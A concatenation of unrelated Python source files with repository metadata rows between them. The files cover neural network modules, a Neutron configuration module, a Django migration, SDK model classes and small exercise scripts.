class Conv3x3GNReLU(nn.Module):
    """3x3 conv -> GroupNorm(32 groups) -> ReLU, with an optional trailing
    spatial upsample via ``F.interpolate``."""
    def __init__(
        self,
        in_channels,
        out_channels,
        upsample=False,
        upsample_scale: int = 2,
        interpolation_mode: str = "bilinear",
        align_corners: bool = True,
    ):
        """
        Args:
            in_channels: number of input feature channels
            out_channels: number of output feature channels (must be
                divisible by the 32 GroupNorm groups)
            upsample: when True, upsample the result spatially
            upsample_scale: scale factor used by the upsample step
            interpolation_mode: interpolation mode for ``F.interpolate``
            align_corners: forwarded to ``F.interpolate``
        """
        super().__init__()
        self.upsample = upsample
        self.upsample_scale = upsample_scale
        self.interpolation_mode = interpolation_mode
        self.align_corners = align_corners
        conv = nn.Conv2d(
            in_channels,
            out_channels,
            kernel_size=3,
            stride=1,
            padding=1,
            bias=False,
        )
        self.block = nn.Sequential(
            conv,
            nn.GroupNorm(32, out_channels),
            nn.ReLU(inplace=True),
        )
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Apply conv-norm-activation; optionally upsample the result."""
        out = self.block(x)
        if not self.upsample:
            return out
        return F.interpolate(
            out,
            scale_factor=self.upsample_scale,
            mode=self.interpolation_mode,
            align_corners=self.align_corners,
        )
class SegmentationBlock(nn.Module):
    """Chain of Conv3x3GNReLU stages that upsamples ``num_upsamples`` times."""
    def __init__(
        self, in_channels: int, out_channels: int, num_upsamples: int = 0
    ):
        """
        Args:
            in_channels: channels of the incoming feature map
            out_channels: channels of every stage in the chain
            num_upsamples: how many 2x upsampling stages to apply in total
        """
        super().__init__()
        stages = [
            Conv3x3GNReLU(
                in_channels, out_channels, upsample=bool(num_upsamples)
            )
        ]
        # range(1, n) is empty for n <= 1, so extra stages are added only
        # when more than one upsampling step was requested.
        stages.extend(
            Conv3x3GNReLU(out_channels, out_channels, upsample=True)
            for _ in range(1, num_upsamples)
        )
        self.block = nn.Sequential(*stages)
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Run the input through the chained conv/upsample stages."""
        return self.block(x)
__all__ = ["DecoderFPNBlock", "Conv3x3GNReLU", "SegmentationBlock"]
| [
"noreply@github.com"
] | 418sec.noreply@github.com |
a5675c5781886c2efa317d61bb02a5aa1e60eabe | 3be8b5d0334de1f3521dd5dfd8a58704fb8347f9 | /dependencies/mongo/example/nested_reference.py | a69614dea4ae0d495a5995665ac30ce01e296563 | [
"MIT"
] | permissive | bmillham/djrq2 | 21a8cbc3087d7ad46087cd816892883cd276db7d | 5f357b3951600a9aecbe6c50727891b1485df210 | refs/heads/master | 2023-07-07T01:07:35.093669 | 2023-06-26T05:21:33 | 2023-06-26T05:21:33 | 72,969,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # encoding: utf-8
from marrow.mongo.document import Document
from marrow.mongo.field import ObjectId, String, Embed
class Sample(Document):
    """Example document demonstrating an embedded sub-document field."""
    class Nested(Document):
        # Sub-document holding a plain string and an ObjectId reference.
        name = String()
        reference = ObjectId()
    id = ObjectId('_id')
    # default/assign ensure every Sample instance gets a concrete Nested.
    nested = Embed(Nested, default=lambda: Nested(), assign=True)
from pprint import pprint
# Comparison operators on document fields build MongoDB query fragments;
# show one for a top-level field and one for an embedded field.
pprint(Sample.id == None)
pprint(Sample.nested.name == "Alice")
| [
"bmillham@gmail.com"
] | bmillham@gmail.com |
41cc6093c3c0a68f6f0a994159f9a2551570180c | 5a281cb78335e06c631181720546f6876005d4e5 | /karbor-1.3.0/karbor/services/operationengine/engine/triggers/timetrigger/timeformats/crontab_time.py | e11467c8c185fbb93e1b6e2cce38bebbd4bd4c07 | [
"Apache-2.0"
] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 1,856 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from croniter import croniter
from datetime import datetime
from oslo_utils import timeutils
from karbor import exception
from karbor.i18n import _
from karbor.services.operationengine.engine.triggers.timetrigger import \
timeformats
class Crontab(timeformats.TimeFormat):
    """Time format whose trigger pattern is a crontab expression."""
    def __init__(self, start_time, pattern):
        """Remember the start time and crontab pattern for this trigger."""
        self._start_time = start_time
        self._pattern = pattern
        super(Crontab, self).__init__(start_time, pattern)
    @classmethod
    def check_time_format(cls, pattern):
        """Raise InvalidInput unless ``pattern`` is a parseable crontab."""
        if not pattern:
            raise exception.InvalidInput(_("The trigger pattern is None"))
        try:
            croniter(pattern)
        except Exception:
            raise exception.InvalidInput(
                _("The trigger pattern(%s) is invalid") % pattern)
    def compute_next_time(self, current_time):
        """Return the first trigger time at or after ``current_time``.

        Times before the configured start time are clamped to it.
        """
        base = max(current_time, self._start_time)
        return croniter(self._pattern, base).get_next(datetime)
    def get_min_interval(self):
        """Return seconds between the next two firings, or None on error."""
        try:
            first = self.compute_next_time(datetime.now())
            second = self.compute_next_time(first)
            return timeutils.delta_seconds(first, second)
        except Exception:
            # Best effort: an unschedulable pattern yields no interval.
            return None
| [
"Wayne Gong@minbgong-winvm.cisco.com"
] | Wayne Gong@minbgong-winvm.cisco.com |
f89a2a68338f83f4a881cb9afc97f86862752b31 | 0a08829b3327ecf180c72c03d0ba76d5ce118ae6 | /src/traffic_sign_classifier/model.py | da8623a2702b2c8fe677c5160aeab1dc25f0a117 | [] | no_license | ajunlonglive/self-driving-vehicle | 3ce2b83a642a7fc148288e12da9689592078a678 | a66746dea5448dcb175ab85a0a46ef60a09d185e | refs/heads/master | 2023-05-14T05:46:01.490492 | 2020-05-26T06:03:30 | 2020-05-26T06:03:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,388 | py | import numpy as np
import tensorflow as tf
from tensorflow.keras import layers
def dataset_pipeline(images, labels, input_fn, params, mode="train"):
    """Create a tf.data pipeline over (image, label, num_classes) triples.

    ``input_fn`` is mapped over every triple; in "train" mode the dataset
    is repeated for params["epochs"], reshuffled every iteration and
    batched, otherwise it is only batched.
    """
    # Broadcast the class count so every element carries it (input_fn
    # presumably uses it, e.g. for one-hot encoding -- TODO confirm).
    num_classes = tf.constant(
        np.repeat(params["num_classes"], len(images)).astype(np.int32), dtype=tf.int32
    )
    # NOTE(review): the third argument lands in tf.assert_equal's ``message``
    # parameter; it looks intended as a third equality operand -- confirm.
    tf.assert_equal(tf.shape(images)[0], tf.shape(labels)[0], tf.shape(num_classes)[0])
    shuffle_buffer_size = np.int32(images.shape[0])
    with tf.name_scope("input_pipeline"):
        data_pipeline = tf.data.Dataset.from_tensor_slices((images, labels, num_classes))
        # We should map the data set first before making batches
        data_pipeline = data_pipeline.map(input_fn, num_parallel_calls=2)
        if mode == "train":
            data_pipeline = data_pipeline.repeat(params["epochs"]) \
                .shuffle(buffer_size=shuffle_buffer_size, reshuffle_each_iteration=True) \
                .batch(params["batch_size"])
        else:
            data_pipeline = data_pipeline.batch(params["batch_size"])
    return data_pipeline
class LeNet(tf.Module):
    """LeNet-style convolutional network producing raw class logits."""
    def __init__(self, num_classes):
        """Build the layers; ``num_classes`` sets the logits width."""
        self.conv1 = layers.Conv2D(filters=6, kernel_size=(5, 5), strides=1, activation="relu")
        # BatchNorm layers are constructed but currently disabled in the
        # forward pass; kept so any existing checkpoints retain their
        # variable structure.
        self.bn1 = layers.BatchNormalization()
        self.pool1 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
        self.conv2 = layers.Conv2D(filters=16, kernel_size=(5, 5), strides=1, activation="relu")
        self.bn2 = layers.BatchNormalization()
        self.pool2 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
        self.flatten = layers.Flatten()
        self.dense = layers.Dense(120, activation="relu")
        self.dense2 = layers.Dense(84, activation="relu")
        self.logits = layers.Dense(num_classes)
    def __call__(self, features):
        """Return unnormalized class logits for a batch of images."""
        out = self.conv1(features)
        out = self.pool1(out)
        out = self.conv2(out)
        out = self.pool2(out)
        out = self.flatten(out)
        out = self.dense(out)
        # Fix: dense2 (the classic 84-unit LeNet FC layer) was constructed
        # in __init__ but never called, leaving it as a dead layer.
        out = self.dense2(out)
        return self.logits(out)
| [
"sardhendumishra@gmail.com"
] | sardhendumishra@gmail.com |
bed7c0f2544d7469900ac7b0c9d6a9378ac8d8be | b26772a7ac736f5454815567817feda20d690363 | /source/lists/migrations/0005_translationslist_language.py | 0dec92a3e658e3b07c63c711cf39fead34de7222 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | mverleg/WW | 3f49e4be411a6203951fccf6f967f8164b988d09 | b58a9bbfc91d19541840f490ed59997d85389c0a | refs/heads/master | 2021-01-10T06:53:22.004564 | 2015-09-23T21:28:13 | 2015-09-23T21:28:13 | 54,189,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add an optional per-list ``language`` choice to TranslationsList."""
    dependencies = [
        ('lists', '0004_more_help_text'),
    ]
    operations = [
        migrations.AddField(
            model_name='translationslist',
            name='language',
            field=models.CharField(blank=True, max_length=8, null=True, help_text=b'You can select the language to learn for this list, or leave it blank for a mixed-language list.', choices=[(b'en-gb', 'English (British)'), (b'zh-cn', 'Chinese (simplified Mandarin)'), (b'de', 'German'), (b'nl', 'Dutch')]),
            preserve_default=True,
        ),
    ]
| [
"mark@rafiki"
] | mark@rafiki |
4113f46b5b98d26a87750e2dfe93b09c474d84ff | 8fbd17c39db677b91442f6e26d7e760d8296c064 | /chapter_11/fmnist_momentum.py | 9e6f464027c6e5af29db09ee0772ea3f11d7c188 | [
"MIT"
] | permissive | a1ip/MathForDeepLearning | 869172a36292a77195d28ffee23281e25a0440e3 | 8db1a85ce3cef4b48aab01ebe156e3fab2dfa271 | refs/heads/main | 2023-09-02T13:17:54.098315 | 2021-10-24T13:40:26 | 2021-10-24T13:40:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | #
# file: fmnist_momentum.py
#
# Train and test the small 14x14 FMNIST dataset.
#
# RTK, 03-Feb-2021
# Last update: 19-Feb-2021
#
################################################################
from sklearn.metrics import matthews_corrcoef
import numpy as np
from NNm import *
# Load, reshape, and scale the data
# Pixel values are scaled into [0, 1]; labels come one-hot for training
# ("_vector") and as plain class indices for evaluation.
x_train = np.load("../dataset/fmnist_train_images_small.npy")/255
x_test = np.load("../dataset/fmnist_test_images_small.npy")/255
y_train = np.load("../dataset/fmnist_train_labels_vector.npy")
y_test = np.load("../dataset/fmnist_test_labels.npy")
# Flatten each 14x14 image into a 1x196 row vector.
x_train = x_train.reshape(x_train.shape[0], 1, 14*14)
x_test = x_test.reshape(x_test.shape[0], 1, 14*14)
# Build the network using sigmoid activations
net = Network(verbose=True)
net.add(FullyConnectedLayer(14*14, 100, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(100, 50, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(50, 10, momentum=0.9))
net.add(ActivationLayer())
# Loss and train
net.fit(x_train, y_train, minibatches=40000, learning_rate=0.2)
# Build the confusion matrix using the test set predictions
out = net.predict(x_test)
pred = np.array(out)[:,0,:]
cm = np.zeros((10,10), dtype="uint32")
# Row = true class, column = predicted class.
for i in range(len(y_test)):
    cm[y_test[i],np.argmax(out[i])] += 1
# Show the results
print()
print(np.array2string(cm))
print()
print("accuracy = %0.7f" % (np.diag(cm).sum() / cm.sum(),))
print("MCC = %0.7f" % matthews_corrcoef(y_test, np.argmax(pred, axis=1)))
print()
| [
"oneelkruns@hotmail.com"
] | oneelkruns@hotmail.com |
00e20cd468336b04b4956713b6b9fd482529e2bb | dddbfd8eb6dff0bd3449bac87ee76b5c3e0bdfb1 | /icehouse-patches/neutron/vlan2vlan/neutron/common/config.py | 825672289770b3d46951b001355f5f0c0047d420 | [
"Apache-2.0"
] | permissive | joey5678/tricircle | 40897fed8fe9d6772e8878b4f06ba1a829636488 | e211f7efef129bbfb038cc05232ea1de33f82a97 | refs/heads/master | 2021-01-17T21:04:32.945469 | 2014-11-17T09:46:29 | 2014-11-17T10:10:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,309 | py | # Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Routines for configuring Neutron
"""
import os
from oslo.config import cfg
from oslo.db import options as db_options
from oslo import messaging
from paste import deploy
from neutron.api.v2 import attributes
from neutron.common import utils
from neutron.openstack.common import log as logging
from neutron import version
LOG = logging.getLogger(__name__)
core_opts = [
cfg.StrOpt('bind_host', default='0.0.0.0',
help=_("The host IP to bind to")),
cfg.IntOpt('bind_port', default=9696,
help=_("The port to bind to")),
cfg.StrOpt('api_paste_config', default="api-paste.ini",
help=_("The API paste config file to use")),
cfg.StrOpt('api_extensions_path', default="",
help=_("The path for API extensions")),
cfg.StrOpt('policy_file', default="policy.json",
help=_("The policy file to use")),
cfg.StrOpt('auth_strategy', default='keystone',
help=_("The type of authentication to use")),
cfg.StrOpt('core_plugin',
help=_("The core plugin Neutron will use")),
cfg.ListOpt('service_plugins', default=[],
help=_("The service plugins Neutron will use")),
cfg.StrOpt('base_mac', default="fa:16:3e:00:00:00",
help=_("The base MAC address Neutron will use for VIFs")),
cfg.IntOpt('mac_generation_retries', default=16,
help=_("How many times Neutron will retry MAC generation")),
cfg.BoolOpt('allow_bulk', default=True,
help=_("Allow the usage of the bulk API")),
cfg.BoolOpt('allow_pagination', default=False,
help=_("Allow the usage of the pagination")),
cfg.BoolOpt('allow_sorting', default=False,
help=_("Allow the usage of the sorting")),
cfg.StrOpt('pagination_max_limit', default="-1",
help=_("The maximum number of items returned in a single "
"response, value was 'infinite' or negative integer "
"means no limit")),
cfg.IntOpt('max_dns_nameservers', default=5,
help=_("Maximum number of DNS nameservers")),
cfg.IntOpt('max_subnet_host_routes', default=20,
help=_("Maximum number of host routes per subnet")),
cfg.IntOpt('max_fixed_ips_per_port', default=5,
help=_("Maximum number of fixed ips per port")),
cfg.IntOpt('dhcp_lease_duration', default=86400,
deprecated_name='dhcp_lease_time',
help=_("DHCP lease duration (in seconds). Use -1 to tell "
"dnsmasq to use infinite lease times.")),
cfg.BoolOpt('dhcp_agent_notification', default=True,
help=_("Allow sending resource operation"
" notification to DHCP agent")),
cfg.BoolOpt('allow_overlapping_ips', default=False,
help=_("Allow overlapping IP support in Neutron")),
cfg.StrOpt('host', default=utils.get_hostname(),
help=_("The hostname Neutron is running on")),
cfg.BoolOpt('force_gateway_on_subnet', default=False,
help=_("Ensure that configured gateway is on subnet")),
cfg.BoolOpt('notify_nova_on_port_status_changes', default=True,
help=_("Send notification to nova when port status changes")),
cfg.BoolOpt('notify_nova_on_port_data_changes', default=True,
help=_("Send notification to nova when port data (fixed_ips/"
"floatingip) changes so nova can update its cache.")),
cfg.StrOpt('nova_url',
default='http://127.0.0.1:8774/v2',
help=_('URL for connection to nova')),
cfg.StrOpt('nova_admin_username',
help=_('Username for connecting to nova in admin context')),
cfg.StrOpt('nova_admin_password',
help=_('Password for connection to nova in admin context'),
secret=True),
cfg.StrOpt('nova_admin_tenant_id',
help=_('The uuid of the admin nova tenant')),
cfg.StrOpt('nova_admin_auth_url',
default='http://localhost:5000/v2.0',
help=_('Authorization URL for connecting to nova in admin '
'context')),
cfg.StrOpt('nova_ca_certificates_file',
help=_('CA file for novaclient to verify server certificates')),
cfg.BoolOpt('nova_api_insecure', default=False,
help=_("If True, ignore any SSL validation issues")),
cfg.StrOpt('nova_region_name',
help=_('Name of nova region to use. Useful if keystone manages'
' more than one region.')),
cfg.IntOpt('send_events_interval', default=2,
help=_('Number of seconds between sending events to nova if '
'there are any events to send.')),
# add by j00209498
cfg.StrOpt('cascade_str', default='cascaded',
help=_('cascade_str identity cascading openstack or cascaded'
'openstack, value = cascaded or cascading.')),
]
# Options that are also exposed as command-line flags.
core_cli_opts = [
    cfg.StrOpt('state_path',
               default='/var/lib/neutron',
               help=_("Where to store Neutron state files. "
                      "This directory must be writable by the agent.")),
]
# Register the configuration options
cfg.CONF.register_opts(core_opts)
cfg.CONF.register_cli_opts(core_cli_opts)
# Ensure that the control exchange is set correctly
messaging.set_transport_defaults(control_exchange='neutron')
# In-memory SQLite placeholder; real deployments override [database]/connection.
_SQL_CONNECTION_DEFAULT = 'sqlite://'
# Update the default QueuePool parameters. These can be tweaked by the
# configuration variables - max_pool_size, max_overflow and pool_timeout
db_options.set_defaults(cfg.CONF,
                        connection=_SQL_CONNECTION_DEFAULT,
                        sqlite_db='', max_pool_size=10,
                        max_overflow=20, pool_timeout=10)
def init(args, **kwargs):
    """Parse config/CLI arguments, initialize RPC and validate base_mac.

    :param args: command-line argument list forwarded to oslo.config
    :raises Exception: if the configured ``base_mac`` is not a valid MAC
    """
    cfg.CONF(args=args, project='neutron',
             version='%%prog %s' % version.version_info.release_string(),
             **kwargs)
    # FIXME(ihrachys): if import is put in global, circular import
    # failure occurs
    from neutron.common import rpc as n_rpc
    n_rpc.init(cfg.CONF)
    # Validate that the base_mac is of the correct format
    msg = attributes._validate_regex(cfg.CONF.base_mac,
                                     attributes.MAC_PATTERN)
    if msg:
        msg = _("Base MAC: %s") % msg
        raise Exception(msg)
def setup_logging(conf):
    """Configure logging for the neutron product.

    :param conf: a cfg.ConfOpts object (currently unused; kept for the
        established call signature)
    """
    logging.setup("neutron")
    LOG.info(_("Logging enabled!"))
def load_paste_app(app_name):
    """Build and return a WSGI application from a paste config file.

    :param app_name: name of the application to load
    :raises ConfigFilesNotFoundError: when the config file cannot be located
    :raises RuntimeError: when the application cannot be loaded from it
    """
    located = cfg.CONF.find_file(cfg.CONF.api_paste_config)
    if not located:
        raise cfg.ConfigFilesNotFoundError(
            config_files=[cfg.CONF.api_paste_config])
    full_path = os.path.abspath(located)
    LOG.info(_("Config paste file: %s"), full_path)
    try:
        return deploy.loadapp("config:%s" % full_path, name=app_name)
    except (LookupError, ImportError):
        msg = (_("Unable to load %(app_name)s from "
                 "configuration file %(config_path)s.") %
               {'app_name': app_name,
                'config_path': full_path})
        LOG.exception(msg)
        raise RuntimeError(msg)
| [
"joehuang@huawei.com"
] | joehuang@huawei.com |
cb9a8d46b6e83034c5f9c0d66e55bdebe20adcc4 | d191a04a3ded41175ea84ae88ebddb4f262b7fb1 | /Dynamic_program/47_dice_roll_simulation.py | 21a976620079f907ec469158fee53ad284a8bf02 | [] | no_license | YLyeliang/now_leet_code_practice | ae4aea945bae72ec08b11e57a8f8a3e81e704a54 | 204d770e095aec43800a9771fe88dd553463d2f7 | refs/heads/master | 2022-06-13T20:22:51.266813 | 2022-05-24T05:29:32 | 2022-05-24T05:29:32 | 205,753,056 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,641 | py | # A die simulator generates a random number from 1 to 6 for each roll. You introduced a constraint to the generator
# such that it cannot roll the number i more than rollMax[i] (1-indexed) consecutive times.
#
# Given an array of integers rollMax and an integer n, return the number of distinct sequences that can be obtained
# with exact n rolls.
#
# Two sequences are considered different if at least one element differs from each other. Since the answer may be too
# large, return it modulo 10^9 + 7.
#
#
#
# Example 1:
#
# Input: n = 2, rollMax = [1,1,2,2,2,3]
# Output: 34
# Explanation: There will be 2 rolls of die, if there are no
# constraints on the die, there are 6 * 6 = 36 possible combinations. In this case, looking at rollMax array,
# the numbers 1 and 2 appear at most once consecutively, therefore sequences (1,1) and (2,2) cannot occur,
# so the final answer is 36-2 = 34.
# Example 2:
#
# Input: n = 2, rollMax = [1,1,1,1,1,1]
# Output: 30
# Example 3:
#
# Input: n = 3, rollMax = [1,1,1,2,2,3]
# Output: 181
#
# Constraints:
#
# 1 <= n <= 5000
# rollMax.length == 6
# 1 <= rollMax[i] <= 15
# 问题:有一个骰子模拟器会每次投掷的时候生成一个 1 到 6 的随机数。
# 不过我们在使用它时有个约束,就是使得投掷骰子时,连续掷出数字i的次数不能超过 rollMax[i](i 从 1 开始编号)。
# 给定rollMax和n,返回用n次投掷得到的不同点数序列的数目;
# 假如两个序列中至少存在一个元素不同,就认为这两个序列是不同的。
# 分析:以n=3为例,扔第一次时,i=1,6种情况.假设dp[i][j]为扔i次时以j结尾时的情况
# i=2, 由于rollMax[0,1,2]为1,则不能出现11,22,33的情况,而对于以1结尾的情况为y1,y为非1的数,共5种情况。 对于以4结尾的,则有x4,共6种。
# 则可以得到dp[2][1,2,3]=5, dp[2][4,5,6]=6, dp[2][7] = sum(dp[2]) = 33
# i=3,对于以1结尾的,则有xy1,x为1-6,y为非1数。考虑到dp[2]有33种分布,而在i=2时,以1结尾的情况dp[2][1]有5种,则dp[3][1]=dp[2]-dp[2][1]
# dp[3][1] = dp[3-1] - dp[3-1][1]
# 以另一个例子, i=5, rollMax[5] = 3,以5结尾的情况有如下几种:
# xxxy5
# xxy55
# xy555
# 这几种情况分别对应 而dp[4]的所有情况包含了上述三种情况,现在只要减去不满足上面的情况即可。dp[5][5] = dp[4] - dp[4][5] +dp[3] - dp[3][5] + ...
# 其中dp[4]包含了xxxx的情况,dp[4] - dp[4][5]即 减去xxx5,也就是xxx55的情况,
from typing import List
class Solution:
    def dieSimulator(self, n: int, rollMax: List[int]) -> int:
        """Count distinct sequences of n die rolls, modulo 1e9+7, where
        face j (0-based) never appears more than rollMax[j] times in a row.

        dp[i][j] = number of valid sequences of i rolls ending with face j;
        dp[i][faces] holds the row total.  A sequence ending in a run of k
        trailing j's (1 <= k <= rollMax[j]) is any sequence of i-k rolls
        that does NOT end in j, hence dp[i][j] += dp[i-k][faces] - dp[i-k][j].

        Improvement over the original: the modulo is applied while
        accumulating, so intermediate values stay bounded instead of growing
        into arbitrarily large integers for big n.
        """
        MOD = 1000000007
        faces = len(rollMax)
        # (n + 1) x (faces + 1) table; the extra column stores row sums.
        dp = [[0] * (faces + 1) for _ in range(n + 1)]
        # Base cases: zero rolls -> one (empty) sequence;
        # one roll -> one sequence per face, `faces` sequences in total.
        dp[0][faces] = 1
        for j in range(faces):
            dp[1][j] = 1
        dp[1][faces] = faces
        # Fill the table from 2 rolls up to n rolls.
        for i in range(2, n + 1):
            for j in range(faces):
                for k in range(1, rollMax[j] + 1):
                    if i - k < 0:
                        break
                    # Python's % keeps the result non-negative even when the
                    # difference is negative.
                    dp[i][j] = (dp[i][j] + dp[i - k][faces] - dp[i - k][j]) % MOD
            dp[i][faces] = sum(dp[i][:faces]) % MOD
        return dp[n][faces] % MOD
| [
"k87974@163.com"
] | k87974@163.com |
4c9a02b5409c94b1bb4ea0e3c04bac9a3ea27a01 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-gsl/huaweicloudsdkgsl/v3/model/show_real_named_response.py | a878e053144f5e24e1385f5992007dfc2351944c | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,870 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowRealNamedResponse(SdkResponse):
    """Response model for the GSL "show real-named status" API call.

    Attributes:
        openapi_types (dict): The key is attribute name
                            and the value is attribute type.
        attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute names whose values are masked as "****" in to_dict() output.
    sensitive_list = []
    # Maps each model attribute to its declared OpenAPI type.
    openapi_types = {
        'iccid': 'str',
        'real_named': 'bool'
    }
    # Maps each model attribute to its JSON key in the wire format.
    attribute_map = {
        'iccid': 'iccid',
        'real_named': 'real_named'
    }
    def __init__(self, iccid=None, real_named=None):
        """ShowRealNamedResponse - a model defined in huaweicloud sdk

        :param iccid: SIM card ICCID
        :param real_named: whether the card passed real-name verification
        """
        super(ShowRealNamedResponse, self).__init__()
        # Backing fields; exposed through the properties below.
        self._iccid = None
        self._real_named = None
        self.discriminator = None
        if iccid is not None:
            self.iccid = iccid
        if real_named is not None:
            self.real_named = real_named
    @property
    def iccid(self):
        """Gets the iccid of this ShowRealNamedResponse.
        ICCID
        :return: The iccid of this ShowRealNamedResponse.
        :rtype: str
        """
        return self._iccid
    @iccid.setter
    def iccid(self, iccid):
        """Sets the iccid of this ShowRealNamedResponse.
        ICCID
        :param iccid: The iccid of this ShowRealNamedResponse.
        :type: str
        """
        self._iccid = iccid
    @property
    def real_named(self):
        """Gets the real_named of this ShowRealNamedResponse.
        True if the SIM card has passed real-name verification, else False.
        :return: The real_named of this ShowRealNamedResponse.
        :rtype: bool
        """
        return self._real_named
    @real_named.setter
    def real_named(self, real_named):
        """Sets the real_named of this ShowRealNamedResponse.
        True if the SIM card has passed real-name verification, else False.
        :param real_named: The real_named of this ShowRealNamedResponse.
        :type: bool
        """
        self._real_named = real_named
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialize nested models; mask sensitive attributes.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        # Python 2 compatibility shim kept by the SDK code generator.
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
    def __repr__(self):
        """For `print`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        # Value equality: compares every instance attribute.
        if not isinstance(other, ShowRealNamedResponse):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
e0fd8a8d176a8e39489490cca6af92f2274b1118 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_285/ch34_2019_06_03_00_25_27_762087.py | f2819fd0219c42be675bd7d5afd0366d356bc55b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | deposito= float(input("depósito inicial: "))
taxa= float(input("taxa de juros: "))
total=0
mes=1
contador=0
while contador<=24:
mes+=deposito*(1+taxa)
deposito=mes
print(mes, '.2f')
contador+=1
total+=deposito*taxa
print(total, '.2f') | [
"you@example.com"
] | you@example.com |
7216333c302abb5b4fec775da03c1c66a1cae875 | e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d | /a10sdk/core/rate/rate_limit.py | 929ad6636bdb4d3038f3d89fee75dae645facb41 | [
"Apache-2.0"
] | permissive | amwelch/a10sdk-python | 4179565afdc76cdec3601c2715a79479b3225aef | 3e6d88c65bd1a2bf63917d14be58d782e06814e6 | refs/heads/master | 2021-01-20T23:17:07.270210 | 2015-08-13T17:53:23 | 2015-08-13T17:53:23 | 40,673,499 | 0 | 0 | null | 2015-08-13T17:51:35 | 2015-08-13T17:51:34 | null | UTF-8 | Python | false | false | 1,402 | py | from a10sdk.common.A10BaseClass import A10BaseClass
class RateLimit(A10BaseClass):
    """Rate limit configuration object.

    :param maxPktNum: {"description": "Max number of packets", "format": "number", "default": 10000, "optional": true, "maximum": 100000, "minimum": 1000, "type": "number"}
    :param rl_type: {"optional": true, "enum": ["ctrl"], "type": "string", "description": "'ctrl': The max number of packets that can be sent to kernel in 100ms; ", "format": "enum"}
    :param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
    :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`

    Supports CRUD operations and inherits from `common/A10BaseClass`;
    this class is the "PARENT" class for this module.

    URL for this object::
        `https://<Hostname|Ip address>//axapi/v3/rate-limit`.
    """
    def __init__(self, **kwargs):
        self.ERROR_MSG = ""
        self.required = []
        # REST resource identity.
        self.b_key = "rate-limit"
        self.a10_url = "/axapi/v3/rate-limit"
        self.DeviceProxy = ""
        # Configurable attributes, empty until set by the caller.
        self.maxPktNum = ""
